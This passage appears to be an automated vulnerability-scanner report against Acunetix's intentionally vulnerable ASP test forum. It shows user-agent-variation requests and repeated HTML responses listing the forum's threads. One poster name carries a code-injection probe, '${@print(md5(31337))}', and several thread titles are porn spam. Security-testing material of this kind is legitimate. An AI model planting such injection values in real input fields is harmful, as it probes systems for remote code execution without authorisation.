style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
| Evidence | |
| Request Header - size: 401 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:11 GMT Content-Length: 10038 |
| Response Body - size: 10,038 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Acunetix Web Vulnerability Scanner</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Acunetix Web Vulnerability Scanner </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>42</a></div></td><td>36</td><td>Pedro Miguel</td><td>3/13/2022 2:43:15 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>42</a></div></td><td>7</td><td>Pedro Miguel</td><td>3/13/2022 3:13:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=5'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=6'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=7'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=8'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=9'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=10'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=11'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=12'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=13'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=14'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=15'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=16'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=17'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=18'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=19'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=20'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=21'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=22'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=23'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=24'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=25'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=26'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=27'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=28'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=29'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=30'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:13:43 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=31'>Hot galleries, daily updated collections</a></div></td><td>1</td><td>victoriadi1</td><td>3/13/2022 10:23:53 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=32'>Big Ass Photos - Free Huge Butt Porn, Big Booty Pics</a></div></td><td>1</td><td>susanac1</td><td>3/13/2022 12:03:13 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=33'>Best Nude Playmates & Centerfolds, Beautiful galleries daily updates</a></div></td><td>1</td><td>kristiela3</td><td>3/13/2022 3:28:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=34'>New hot project galleries, daily updates</a></div></td><td>1</td><td>friedajd1</td><td>3/13/2022 9:02:56 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=35'>Free Porn Pictures and Best HD Sex Photos</a></div></td><td>1</td><td>dianezg60</td><td>3/13/2022 11:25:30 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=36'>test</a></div></td><td>1</td><td>hanxuan</td><td>3/14/2022 1:14:17 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=37'>Hot photo galleries blogs and pictures</a></div></td><td>1</td><td>sethpq11</td><td>3/14/2022 2:11:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=38'>Mr.</a></div></td><td>1</td><td>${@print(md5(31337))}\</td><td>3/14/2022 4:18:48 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=39'>Shemale Sexy Galleries</a></div></td><td>1</td><td>ineshy11</td><td>3/14/2022 6:42:20 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=40'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn</a></div></td><td>12</td><td>myrnaou3</td><td>3/14/2022 8:17:05 AM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) |
| Evidence | |
| Request Header - size: 412 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:12 GMT Content-Length: 10038 |
| Response Body - size: 10,038 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Acunetix Web Vulnerability Scanner</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Acunetix Web Vulnerability Scanner </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>42</a></div></td><td>36</td><td>Pedro Miguel</td><td>3/13/2022 2:43:15 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>42</a></div></td><td>7</td><td>Pedro Miguel</td><td>3/13/2022 3:13:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=5'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=6'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=7'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=8'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=9'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=10'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=11'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=12'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=13'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=14'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=15'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=16'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=17'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=18'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=19'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=20'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=21'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=22'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=23'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=24'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=25'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=26'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=27'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=28'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=29'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=30'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:13:43 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=31'>Hot galleries, daily updated collections</a></div></td><td>1</td><td>victoriadi1</td><td>3/13/2022 10:23:53 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=32'>Big Ass Photos - Free Huge Butt Porn, Big Booty Pics</a></div></td><td>1</td><td>susanac1</td><td>3/13/2022 12:03:13 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=33'>Best Nude Playmates & Centerfolds, Beautiful galleries daily updates</a></div></td><td>1</td><td>kristiela3</td><td>3/13/2022 3:28:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=34'>New hot project galleries, daily updates</a></div></td><td>1</td><td>friedajd1</td><td>3/13/2022 9:02:56 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=35'>Free Porn Pictures and Best HD Sex Photos</a></div></td><td>1</td><td>dianezg60</td><td>3/13/2022 11:25:30 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=36'>test</a></div></td><td>1</td><td>hanxuan</td><td>3/14/2022 1:14:17 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=37'>Hot photo galleries blogs and pictures</a></div></td><td>1</td><td>sethpq11</td><td>3/14/2022 2:11:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=38'>Mr.</a></div></td><td>1</td><td>${@print(md5(31337))}\</td><td>3/14/2022 4:18:48 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=39'>Shemale Sexy Galleries</a></div></td><td>1</td><td>ineshy11</td><td>3/14/2022 6:42:20 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=40'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn</a></div></td><td>12</td><td>myrnaou3</td><td>3/14/2022 8:17:05 AM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 |
| Evidence | |
| Request Header - size: 470 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:13 GMT Content-Length: 10038 |
| Response Body - size: 10,038 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Acunetix Web Vulnerability Scanner</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Acunetix Web Vulnerability Scanner </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>42</a></div></td><td>36</td><td>Pedro Miguel</td><td>3/13/2022 2:43:15 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>42</a></div></td><td>7</td><td>Pedro Miguel</td><td>3/13/2022 3:13:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=5'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=6'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=7'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=8'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=9'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=10'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=11'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=12'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=13'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=14'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=15'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr 